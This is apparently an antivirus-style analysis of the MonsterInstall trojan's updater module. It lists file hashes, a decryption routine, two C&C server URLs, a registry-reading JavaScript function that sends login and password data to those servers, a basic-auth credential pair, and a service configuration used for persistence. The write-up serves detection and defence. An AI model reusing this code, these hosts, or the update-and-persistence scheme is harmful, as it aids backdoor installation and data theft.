SHA1:
- 4f053ad18150f07f15039bd845d3e2db8bd50c72 (main.js)
- b24e8dfd44a42a74e8c47d759d36fc178d988a93 (start.js)
- 2cfa09b812f90c9f1e0a1e620c4ef9d8f8f6b5e7 (crypto.dll)
- d0a6fab0e4c98413f56f96d68c11ebd64db090cf (network.dll)
- 444d4a915ba55a46b9c551ba4a6c1398a1cd5e16 (windows.dll)
- efe12a67e009c93f0702cc775b78bc70bdac0cd3 (service.exe)
Description
A part of the MonsterInstall trojan that’s responsible for updating the backdoor. It consists of several js-scripts and native C++ libraries.
Operating routine
The script is launched using Node.js. It installs itself in the system into the C:\Windows\Reserve Service directory and runs as a service.
Libraries:
| sha1: | name | ts | Pdb |
|---|---|---|---|
| 7e6fc66e77fc02b36889043f65d9b654d826b780 | 7z.dll | 09.10.2016 01:26:26 | |
| d0d68b64b39495de80add1a66ecb55cab43a6b25 | 7zip.dll | 16.08.2018 22:02:00 | B:\Develop\VisualStudioProject\module\7zip\Release\7zip.pdb |
| 2cfa09b812f90c9f1e0a1e620c4ef9d8f8f6b5e7 | crypto.dll | 20.08.2018 03:14:44 | B:\Develop\VisualStudioProject\module\crypto\Release\crypto.pdb |
| d0a6fab0e4c98413f56f96d68c11ebd64db090cf | network.dll | 17.08.2018 18:38:49 | B:\Develop\VisualStudioProject\module\network\Release\network.pdb |
| 444d4a915ba55a46b9c551ba4a6c1398a1cd5e16 | windows.dll | 20.08.2018 22:10:36 | B:\Develop\VisualStudioProject\module\windows\Release\windows.pdb |
| efe12a67e009c93f0702cc775b78bc70bdac0cd3 | daemon\service.exe | 22.03.2013 19:31:16 | c:\Users\Corey\Documents\workspace\node-windows\_tmp\winsw\obj\Release\winsw.pdb |
The main module of the trojan is main.js. It sends a request to google.com, yandex.ru or www.i.ua in order to obtain the current date. After that, it decrypts the contents of the file bootList.json with the help of crypto.dll library.
Decryption algorithm:
key = '123'
s = ''
for i in range(len(d)):
s += chr((ord(d[i]) - ord(key[i % len(key)])) & 0xff)
In the decrypted .json file there’s a list of C&C servers:
[{"node":"http://cortel8x.beget.tech/reserve/","weight":10},{"node":"http://reserve-system.ru/work/","weight":10}]The trojan then reads information from the registry:
function getInfo()
{
var WindowsNodeInfo = new Object();
WindowsNodeInfo.mainId = windowsLib.getStringRegKey("HLM\SOFTWARE\Microsoft\Windows Node", "mainId");
WindowsNodeInfo.login = windowsLib.getStringRegKey("HLM\SOFTWARE\Microsoft\Windows Node", "log");
WindowsNodeInfo.password = windowsLib.getStringRegKey("HLM\SOFTWARE\Microsoft\Windows Node", "pass");
WindowsNodeInfo.source = windowsLib.getStringRegKey("HLM\SOFTWARE\Microsoft\Windows Node", "source");
WindowsNodeInfo.updaterVersion = windowsLib.getStringRegKey("HLM\SOFTWARE\Microsoft\Windows Node", "updaterVersion");
WindowsNodeInfo.workerVersion = windowsLib.getStringRegKey("HLM\SOFTWARE\Microsoft\Windows Node", "workerVersion");
var ReserveSystemInfo = new Object();
ReserveSystemInfo.workerVersion = windowsLib.getStringRegKey("HLM\SOFTWARE\Microsoft\Reserve System", "updaterVersion");
var myInfo = new Object();
myInfo.windowsNode = WindowsNodeInfo;
myInfo.reserveSystem = ReserveSystemInfo;
return JSON.stringify(myInfo);
}
After that, the sends it via POST request to the C&C server decrypted earlier. The HTTP header of the basic authentication, which corresponds to the “cortel:money” pair, is also added to the request.
The server’s response:
{
"data": {
"updaterVersion": [0, 0, 0, 1],
"updaterLink": "/upd.7z",
"updaterVerify": "£ñß(\u0012Ä\ti¾$ë5»\u001c²\u001c\fÙ=±÷ö‚´èUnÐÂBÔ\n\u001dW6?u½\u0005Œn\u000fp:üÍ\u0019\u0000\u000bSý«\u00137®÷\u0013”’ì¥û§s7F\u0016ó\\\u000f%6ñê\"7î<ýo䃃0Æ%tñÅv‚S¡\r\u001e•ÅÆ¡¿N)v\\f8\u0004F\fUS¯‰³§ oIõŒiÆîGݪ\u0017êH/8Ö1-°™[P5E7X‡Fø%SŠXÕ6Oþ=Vô‰…ˆ:.3Œ‚i\u000eÁù9Ã&¾ŒM\u001eÛªé$\u0006#IèÞÛ\u0018À\u001b^è,ÁòÑCTXb\u001d$ç\u0004„ð¶0UVÕ»e\u001f\b\u001e¡Ä¼è+Fjúÿoâz\r!çô3xØs—_\u000b\u0017\u001fY]\u0001¥j^û\\W",
"dateTime": 1534868028000,
"bootList": [{
"node": "http://cortel8x.beget.tech/reserve/",
"weight": 10
}, {
"node": "http://reserve-system.ru/work/",
"weight": 10
}]
},
"dataInfo": "I`ù@ÀP‘ÈcÊÛ´#ièÒ~\u0007<\u0001Ýìûl«ÔÆq\u0013àÛ\u0003\b\u0017ÑLÁ}ÿÚ˜DS®']\u0003bf\u0003!¿Cð¸q¸ÖÜ’B¢CÄAMˆÀA¤d\u001c5¨d-\u0013‰\u0011ѼF‘|SB[¬°(ܹÈÒÜ £L\u00071¾:`\u001bŒìýKõ\"²Ÿ¸$´3™UºÅ¨J†¨cƒf¿}r;Öeì¶x‰ØKt¥‹„47a\u001e¸Ô‡ˆy\u0006•\u001b\u0004‚‹„„•ó\u001a\u0019\nu>¨)bkæ…'\u00127@é‹7µæy3ÈNrS’Mð\u0018\u0019¾òÓ[å5H·¦k‘¿É&PÂÈîåÚ~M\u0010ðnáH擪xÃv cד\u0013
T
ïÑÝ\t\u0018Æ\u00148$”Ôî"
}
The trojan compares value in the dataTime parameter to the current date. If there’s more than a week (counted in milliseconds) difference, the trojan won’t execute commands. The dataInfo parameter contains a signature (field “data”), which is checked using the embedded public main.js key. The list of servers from the “bootList” parameter is encrypted and stored inside the “bootList.json” file.
The trojan compares its version to the version stated in the ”updaterVersion” parameter in the server’s response. If the versions match, the trojan runs "upd\upd.exe” passing "main.js” as a parameter. If the version inside the server’s response is newer, the trojan downloads the upd.7z file using the link inside the "updaterLink" parameter, checks its signature and unzips it. After that, it writes in the registry version of the update [HKLM\SOFTWARE\Microsoft\Reserve System] 'updaterVersion’ and runs "upd\upd.exe” passing "main.js” as a parameter.
start.js
Launches %win%\Reserve Service\reserve.exe "main.js".
service.exe
A build of the “winsw” utitily. It uses the following xml-file with parameters:
<service>
<id>service.exe.exe</id>
<executable>C:\Windows\Reserve Service\reserve.exe</executable>
<arguments>"C:\Windows\Reserve Service\start.js" </arguments>
</service>
